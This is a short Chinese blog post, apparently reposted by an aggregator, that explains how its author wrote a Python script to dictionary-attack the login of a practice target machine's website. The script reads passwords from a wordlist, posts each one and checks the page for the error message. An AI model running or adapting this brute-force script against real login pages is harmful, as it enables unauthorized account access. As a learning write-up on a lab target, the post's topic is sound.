python编写字典爆破网站登录|思路
Posted 向阳-Y.
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python编写字典爆破网站登录|思路相关的知识,希望对你有一定的参考价值。
在做渗透时,因为太菜了,不会用网上的爆破工具,自己就即兴瞎写了一个简单的字典爆破。新手小白可以借鉴思路,,大佬绕道!!,勿喷。就当学习了(其实我觉得能用就行)。
如果有好用的爆破工具,欢迎大佬推荐~
方便理解,我简单说一下背景:
渗透的是某靶机的网站,该靶机只用输入正确密码就能成功登录,在密码错误后在html中会返回如下字段:
所以我用爬虫把这个关键字段给爬出来了与正确密码作比较
import json
from pyquery import PyQuery
import requests
url="这里是url地址(这里为了防止恶意攻击,就不把地址放出来了)"
text="对不起,登录ID或密码(口令)错误" #这里面的文本是爬虫爬出来的网页返回的值
real_password=0
time=0
e=open('pwd.txt',"r")
print("密码爆破开始!")
for login_password in e:
data={'password':login_password}
r = requests.post(url,data=data)
doc=PyQuery(r.text)
time+=1
if doc("#tagContent0 p").text()!=text: #这里拿爬出来的数据和文本作对比,相同则说明密码还是错的,不同说明密码就对了!
real_password=login_password
break
print("密码错误,尝试爆破第{}次".format(time))
print("爆破结束!!")
print("爆破密码为:{}".format(real_password))
e.close()
因为没有把该靶,这个代码需要你们改改才能用
运行截图:
简单记录一下下次的打算(记性差,免得忘了): 下次有机会写一个被加密后的密码的爆破(js逆向)
以上是关于python编写字典爆破网站登录|思路的主要内容,如果未能解决你的问题,请参考以下文章